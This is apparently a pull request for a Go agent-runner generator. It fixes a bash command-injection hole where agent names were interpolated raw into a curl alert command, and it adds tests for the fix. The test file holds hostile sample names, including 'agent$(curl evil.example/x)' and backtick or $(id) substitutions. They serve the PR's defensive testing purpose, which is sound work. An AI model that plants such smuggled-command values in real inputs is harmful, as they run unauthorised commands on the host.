### PR TITLE
fix(runner): escape agent name for alert curl JSON-in-bash sink

### DIFF
--- a/internal/runner/runner.go
+++ b/internal/runner/runner.go
@@ -1,6 +1,7 @@
 package runner
 
 import (
+	"encoding/json"
 	"fmt"
 	"os/user"
 	"sort"
@@ -386,6 +387,23 @@ type RunnerParams struct {
 	SidecarServers string
 }
 
+// bashDoubleQuoteEscaper escapes the four characters that stay live inside a
+// bash double-quoted string.
+var bashDoubleQuoteEscaper = strings.NewReplacer(`\`, `\\`, `"`, `\"`, `$`, `\$`, "`", "\\`")
+
+// escapeForAlert escapes a value for the AlertCurl sink, where it sits inside
+// a JSON string that is itself inside a bash double-quoted argument
+// (AlertTemplate's -d "{\"content\":\"%s\"}"). Bash dequotes the argument
+// first, then the chat API parses the JSON, so the value needs both layers of
+// escaping applied innermost-first: JSON string escaping (via json.Marshal,
+// which also covers control characters), then bash's \ " $ `. The static
+// parts of the alert message rely on that bash layer (${SIZE} expands at
+// runtime), which is why the sink cannot simply switch to single quotes.
+func escapeForAlert(s string) string {
+	j, _ := json.Marshal(s) // marshaling a string never errors
+	return bashDoubleQuoteEscaper.Replace(string(j[1 : len(j)-1]))
+}
+
 // Generate renders the runner.sh content for an agent. Dispatches on the
 // agent's runtime (claude-code default, or opencode).
 func Generate(cfg *config.Config, agentKey string) string {
@@ -412,7 +430,7 @@ func Generate(cfg *config.Config, agentKey string) string {
 
 	alertChannel := cfg.Coordination.Channels["alerts"]
 	backend, _ := coordination.Known(cfg.Coordination.Backend) // validated at load time
-	alertMsg := fmt.Sprintf(`⚠️ %s: CLAUDE.local.md is ${SIZE} bytes (>${MAX_CLAUDE_MD_BYTES}). Trim it to reduce token waste.`, ac.Name)
+	alertMsg := fmt.Sprintf(`⚠️ %s: CLAUDE.local.md is ${SIZE} bytes (>${MAX_CLAUDE_MD_BYTES}). Trim it to reduce token waste.`, escapeForAlert(ac.Name))
 	alertCurl := fmt.Sprintf(`[ -n "$%s" ] && %s`, backend.TokenEnvVar, fmt.Sprintf(backend.AlertTemplate, alertChannel, alertMsg))
 
 	subagentExport := ""

--- a/internal/runner/runner_test.go
+++ b/internal/runner/runner_test.go
@@ -1,6 +1,7 @@
 package runner
 
 import (
+	"encoding/json"
 	"fmt"
 	"strings"
 	"testing"
@@ -139,6 +140,109 @@ func TestGenerate_PreservesUserKillPPID(t *testing.T) {
 
 	if c := strings.Count(out, "kill $PPID"); c != 1 {
 		t.Fatalf("expected exactly one kill $PPID, got %d in:\n%s", c, out)
+	}
+}
+
+// bashDequoteDouble emulates bash's double-quote removal: inside "...",
+// backslash is special only before $ ` " \ (and newline, which never appears
+// in escapeForAlert output — json.Marshal encodes control chars). Used to
+// replay the alert sink's decode chain — bash dequotes the -d argument, then
+// the chat API parses JSON.
+func bashDequoteDouble(s string) string {
+	var b strings.Builder
+	for i := 0; i < len(s); i++ {
+		if s[i] == '\\' && i+1 < len(s) && strings.ContainsRune("$`\"\\", rune(s[i+1])) {
+			b.WriteByte(s[i+1])
+			i++
+			continue
+		}
+		b.WriteByte(s[i])
+	}
+	return b.String()
+}
+
+func TestEscapeForAlert_RoundTripThroughSink(t *testing.T) {
+	names := []string{
+		"plain name",
+		`Lead "Architect"`,
+		"agent$(curl evil.example/x)",
+		"agent`id`",
+		`back\slash`,
+		`tail backslash\`,
+		"$HOME and ${SIZE}",
+		"all\\of\"it`together`$(now)$",
+		// Control chars are rejected at Load(), but the escaper must not
+		// depend on that: json.Marshal encodes them to escape sequences.
+		"line1\nline2\ttab",
+		"html <&> chars",
+		"unicode 日本 ⚠️",
+	}
+	for _, name := range names {
+		escaped := escapeForAlert(name)
+
+		// Safety: after escaping, bash must see no live $, ` or " — each must
+		// sit behind a backslash, or expansion / argument-termination fires.
+		for i := 0; i < len(escaped); i++ {
+			c := escaped[i]
+			if c == '\\' && i+1 < len(escaped) && strings.ContainsRune("$`\"\\", rune(escaped[i+1])) {
+				i++
+				continue
+			}
+			if c == '$' || c == '`' || c == '"' {
+				t.Errorf("name %q: live %q at offset %d in escaped form %q", name, string(c), i, escaped)
+			}
+		}
+
+		// Fidelity: replaying the sink (bash dequote, then JSON parse) must
+		// reproduce the original name exactly.
+		afterBash := bashDequoteDouble(escaped)
+		var decoded string
+		if err := json.Unmarshal([]byte(`"`+afterBash+`"`), &decoded); err != nil {
+			t.Errorf("name %q: invalid JSON after bash dequote (%q): %v", name, afterBash, err)
+			continue
+		}
+		if decoded != name {
+			t.Errorf("name %q: round-trip produced %q", name, decoded)
+		}
+	}
+}
+
+func TestGenerate_AlertCurlEscapesAgentName(t *testing.T) {
+	hostile := "Lead$(id) \"x\" `y` z\\w"
+	cfg := baseCfg("lead", config.AgentConfig{
+		Name:      hostile,
+		Model:     "claude-opus-4-7",
+		Iteration: "1m",
+		Prompt:    "do the thing",
+	})
+
+	out := Generate(cfg, "lead")
+
+	var alertLine string
+	for _, line := range strings.Split(out, "\n") {
+		if strings.Contains(line, "-d ") && strings.Contains(line, "content") {
+			alertLine = line
+			break
+		}
+	}
+	if alertLine == "" {
+		t.Fatalf("alert curl -d line not found in runner:\n%s", out)
+	}
+	// "Lead$(id)" only matches the unescaped form — the escaped line carries
+	// "Lead\$(id)", whose backslash breaks the substring.
+	if strings.Contains(alertLine, "Lead$(id)") {
+		t.Errorf("raw command substitution survives in alert line: %s", alertLine)
+	}
+	if strings.Contains(alertLine, "`y`") {
+		t.Errorf("raw backtick substitution survives in alert line: %s", alertLine)
+	}
+	if !strings.Contains(alertLine, escapeForAlert(hostile)) {
+		t.Errorf("escaped name missing from alert line: %s", alertLine)
+	}
+	// The static message text still relies on runtime expansion of ${SIZE} —
+	// escaping must apply to the name only.
+	if !strings.Contains(alertLine, "${SIZE}") {
+		t.Errorf("runtime ${SIZE} expansion lost from alert line: %s", alertLine)
 	}
 }
 


### PR DESCRIPTION
Closes #115.

## Problem

`Generate()` interpolated `ac.Name` raw into `alertMsg`, which lands in the backend `AlertTemplate` inside a JSON string within a bash double-quoted `-d` argument (`-d "{\"content\":\"%s\"}"`). When the CLAUDE.local.md size alert fired, a name containing `$(...)` or backticks executed commands as the agent user; a double quote or backslash corrupted the JSON payload.

## Fix

New `escapeForAlert` applies the sink's two escape layers innermost-first:

1. JSON string escaping via `json.Marshal` — also covers control characters, so the escaper does not depend on the in-flight Load() control-char validation (#198/PR #198) for payload validity.
2. Bash double-quote escaping for the four characters live inside `"..."`: `\` `"` `$` and backtick.

The static message text keeps runtime `${SIZE}`/`${MAX_CLAUDE_MD_BYTES}` expansion — that bash layer is why the sink cannot simply switch to a single-quoted `-d` argument. Both Discord and Slack templates have the same JSON-in-bash shape and are covered; both runner templates (claude-code and opencode) consume the single escaped `alertMsg`.

Out of scope (separately tracked): `--name`/`log` shell contexts for `ac.Name` (#112), `coordination.channels` values in the same curl (#123). The watchdog alert path is unaffected — it escapes its runtime `$msg` via python `json.dumps`.

## Testing

- `TestEscapeForAlert_RoundTripThroughSink` replays the sink decode chain (bash double-quote removal, then JSON parse) over hostile names — command substitution, backticks, quotes, trailing/lone backslashes, control chars, multibyte — asserting byte-exact round-trip and that no live `$`/backtick/`"` survives escaping.
- `TestGenerate_AlertCurlEscapesAgentName` pins the wiring: escaped name present in the generated `-d` line, raw substitutions absent, `${SIZE}` expansion preserved.
- Verified empirically end-to-end: extracted the generated alert command, ran it in real bash with a curl stub, and JSON-parsed the captured payload — the hostile name round-trips byte-exact and no command executes.
- Full `go test ./...` passes.

Adversarial review ran before this PR: two independent skeptics attempted to break the escaping (shell metachars, JSON injection, backslash-parity attacks, fmt verb corruption, `strings.NewReplacer` rescan semantics, both backends, multibyte) — all attacks failed empirically — and traced every `ac.Name` sink to confirm scope. Review caught two improvements that were applied: the hand-rolled JSON layer was replaced with `json.Marshal` (control-char coverage), and the bash replacer was hoisted to a package-level var.